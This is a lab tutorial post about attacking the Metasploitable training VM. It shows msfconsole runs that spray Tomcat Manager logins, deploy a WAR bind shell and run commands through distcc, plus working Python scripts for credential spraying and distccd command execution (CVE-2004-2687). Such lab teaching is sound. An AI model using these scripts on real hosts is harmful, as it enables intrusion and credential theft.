Metasploitable - your first training ground

Metasploitable is a VMware-based virtual machine running Ubuntu 8.04 Server. A number of vulnerable services have been included, among them an install of Tomcat 5.5 (with weak credentials), distcc, TikiWiki, TWiki, and an older version of MySQL server.

You can use VMware Player to run it, but be aware that you do not want it exposed to the Internet, so choose the virtual machine's networking mode carefully (host-only networking is the safe choice). It is configured in non-persistent-disk mode, so if you mess something up you can just reset it. Here are some of the credentials that you can use to access it:

msfadmin:msfadmin
user:user
service:service
postgres:postgres
klog:123456789

Here are a couple of the things you can do with it in msfconsole:

Using the 'Tomcat Application Manager Login Utility', you can test credentials against the Tomcat Manager application (assuming the manager component is enabled; on Metasploitable, Tomcat listens on port 8180 rather than 8080):

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit


[*] 10.0.1.88:8180 - Trying username:'tomcat' with password:'role1'
[-] http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.1.88:8180 - Trying username:'tomcat' with password:'root'
[-] http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.1.88:8180 - Trying username:'tomcat' with password:'tomcat'
[+] http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 10.0.1.88:8180 - Trying username:'both' with password:'admin'

There you go: a valid login (tomcat:tomcat). Now that we have valid credentials, we can try the Tomcat Manager Application Deployer (tomcat_mgr_deploy), which uploads a WAR file through the manager and executes the JSP inside it:

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1612 bytes as HJpy1H.war ...
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp...
[*] Undeploying HJpy1H ...
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.1.21:39497 -> 10.0.1.88:4444) at 2010-05-12 19:54:16 -0200
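What the login utility is doing under the hood, as an added example in Python that is not part of the original post or of Metasploit itself: the Tomcat Manager sits behind HTTP Basic authentication, so each guess is a single GET to /manager/html with an Authorization header, and the status code alone tells a hit from a miss. The host name and port match the transcript above; the guess list, the _FakeTomcat stand-in and demo() are constructed here so the script runs offline; the reading of 403 (authenticated but lacking the manager role) and 404 (manager not deployed) is how Tomcat behaves, not something the page states.

```python
import base64
import http.client

MANAGER_PATH = "/manager/html"

# Constructed guess list: the pairs the transcript above shows the module trying.
# The real module reads a much longer word list; this is enough to show the flow.
DEFAULT_PAIRS = [
    ("tomcat", "role1"),
    ("tomcat", "root"),
    ("tomcat", "tomcat"),
    ("both", "admin"),
]


def basic_auth_header(user: str, password: str) -> str:
    """HTTP Basic credentials (RFC 7617): 'Basic ' + base64('user:password')."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def classify(status: int) -> str:
    """Turn the manager's status code into a verdict.

    200 -> the pair is valid and has the manager role.
    401 -> the realm rejected the pair; keep guessing.
    403 -> Tomcat authenticated the user but it lacks the manager role
           (assumption about Tomcat's behaviour, not stated on the page).
    404 -> /manager/html is not deployed; spraying it is pointless.
    """
    verdicts = {200: "valid", 401: "invalid", 403: "valid-no-role", 404: "no-manager"}
    return verdicts.get(status, "unexpected")


def try_login(host, port, user, password,
              conn_factory=http.client.HTTPConnection, timeout=5):
    """One authenticated GET against the manager, classified."""
    conn = conn_factory(host, port, timeout=timeout)
    try:
        conn.request("GET", MANAGER_PATH,
                     headers={"Authorization": basic_auth_header(user, password)})
        return classify(conn.getresponse().status)
    finally:
        conn.close()


def spray(host, port, pairs=DEFAULT_PAIRS, conn_factory=http.client.HTTPConnection):
    """Try each pair in order and stop at the first fully valid one (like the module's
    STOP_ON_SUCCESS option). Returns the list of (user, password, verdict) hits."""
    hits = []
    for user, password in pairs:
        verdict = try_login(host, port, user, password, conn_factory)
        print(f"{host}:{port} - Trying {user!r}:{password!r} -> {verdict}")
        if verdict == "no-manager":
            break
        if verdict in ("valid", "valid-no-role"):
            hits.append((user, password, verdict))
            if verdict == "valid":
                break
    return hits


class _FakeTomcat:
    """Constructed stand-in for Metasploitable's Tomcat so the example runs offline:
    only tomcat:tomcat passes Basic auth. Exposes just the HTTPConnection surface used above."""
    _VALID = {basic_auth_header("tomcat", "tomcat")}

    class _Response:
        def __init__(self, status):
            self.status = status

    def __init__(self, host, port, timeout=None):
        self._status = 401

    def request(self, method, path, headers=None):
        auth = (headers or {}).get("Authorization")
        self._status = 200 if (path == MANAGER_PATH and auth in self._VALID) else 401

    def getresponse(self):
        return self._Response(self._status)

    def close(self):
        pass


def demo():
    """Run the spray against the fake; against a real host just drop conn_factory."""
    return spray("metasploitable", 8180, conn_factory=_FakeTomcat)


if __name__ == "__main__":
    print(demo())
```

Against a live Metasploitable you would call spray("metasploitable", 8180) with the real http.client.HTTPConnection; the fake exists only so the control flow can be checked without a target.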

The distcc_exec module is also a nice exploit to play with. In this case we use a command payload (cmd/unix/generic) to run 'cat /etc/passwd' on the target:

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) > set RHOST metasploitable
msf exploit(distcc_exec) > set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) > exploit
connecting...

[*] stdout: root:x:0:0:root:/root:/bin/bash
[*] stdout: daemon:x:1:1:daemon:/usr/sbin:/bin/sh
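How distcc_exec talks to distccd, as an added example in Python that is not from the original post or from Metasploit: the distcc wire protocol is a stream of four-letter tokens each followed by eight hex digits (a value, or the length of the payload that follows), and a distccd started without an --allow restriction (CVE-2004-2687) executes whatever "compiler" the client names, so the job's argv simply starts with sh -c CMD. The request layout follows the module's dist_cmd; the fake source in the DOTI token and the SAMPLE_REPLY that demo() parses are constructed here so the framing and the reply parser can be exercised offline.

```python
import re
import socket

DISTCC_PORT = 3632


def token(name: str, value) -> bytes:
    """One distcc protocol token: a 4-letter name followed by 8 hex digits.
    For DIST/ARGC/DONE/STAT the digits are the value itself; for ARGV/DOTI/SERR/SOUT/DOTO
    they are the byte length of the payload that follows."""
    if isinstance(value, int):
        return f"{name}{value:08x}".encode("ascii")
    data = value.encode() if isinstance(value, str) else value
    return f"{name}{len(data):08x}".encode("ascii") + data


def build_job(cmd: str) -> bytes:
    """Build the compile request the way distcc_exec's dist_cmd does.

    distccd execs argv[0] as the compiler, so 'sh -c CMD' is the compiler and CMD runs.
    The trailing '# -c main.c -o main.o' only exists to satisfy distccd's check that the
    job looks like a real compile (the shell sees it as $0.. and ignores it).
    The DOTI body stands in for the preprocessed source; its content is irrelevant
    (constructed here, the module sends random characters)."""
    argv = ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]
    req = token("DIST", 1) + token("ARGC", len(argv))
    for arg in argv:
        req += token("ARGV", arg)
    req += token("DOTI", "int main(void){return 0;}\n")
    return req


_TOKEN = re.compile(rb"([A-Z]{4})([0-9a-fA-F]{8})")


def parse_reply(data: bytes) -> dict:
    """Walk distccd's reply: DONE <version>, STAT <exit status>, then SERR/SOUT/DOTO
    carrying length-prefixed stderr, stdout and object-file bytes."""
    out, pos = {}, 0
    while pos + 12 <= len(data):
        m = _TOKEN.match(data, pos)
        if not m:
            raise ValueError(f"malformed token at offset {pos}: {data[pos:pos + 12]!r}")
        name, num = m.group(1).decode("ascii"), int(m.group(2), 16)
        pos += 12
        if name in ("DONE", "STAT"):
            out[name] = num
        else:
            if pos + num > len(data):
                raise ValueError(f"truncated {name} payload")
            out[name] = data[pos:pos + num]
            pos += num
    return out


def distcc_exec(host: str, cmd: str, port: int = DISTCC_PORT, timeout: float = 10) -> dict:
    """Send the job to a live distccd and return the parsed reply; SOUT holds CMD's output."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_job(cmd))
        buf = bytearray()
        while chunk := s.recv(65536):
            buf += chunk
    return parse_reply(bytes(buf))


# Constructed reply shaped like distccd's answer to build_job("cat /etc/passwd") on
# Metasploitable: protocol version 1, exit status 0, empty stderr, the first two
# /etc/passwd lines on stdout, and no object file because sh produced none.
SAMPLE_STDOUT = (b"root:x:0:0:root:/root:/bin/bash\n"
                 b"daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n")
SAMPLE_REPLY = (token("DONE", 1) + token("STAT", 0) + token("SERR", b"")
                + token("SOUT", SAMPLE_STDOUT) + token("DOTO", b""))


def demo() -> dict:
    """Parse the constructed reply; swap in distcc_exec('metasploitable', 'cat /etc/passwd')
    to talk to a real target."""
    return parse_reply(SAMPLE_REPLY)


if __name__ == "__main__":
    print(build_job("cat /etc/passwd"))
    for line in demo()["SOUT"].splitlines():
        print("[*] stdout:", line.decode())
```

The interesting part is that nothing here is a memory-corruption trick: the command runs because distccd trusts the client's choice of compiler, which is why the fix is simply restricting who may connect (--allow, or a firewall) rather than a code patch.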

So no need to wait any more – just download Metasploitable and start improving your Metasploit skills!

1 comment to Metasploitable - your first training ground

  • Visitor666

    These do not work. You get an error that the payload is not compatible on the first one (set PAYLOAD linux/x86/shell_bind_tcp) and the second one spits out nothing.

    BackTrack 5 R2 and R3, 64-bit versions. I can change the payload on the first one and get daemon, but not root.
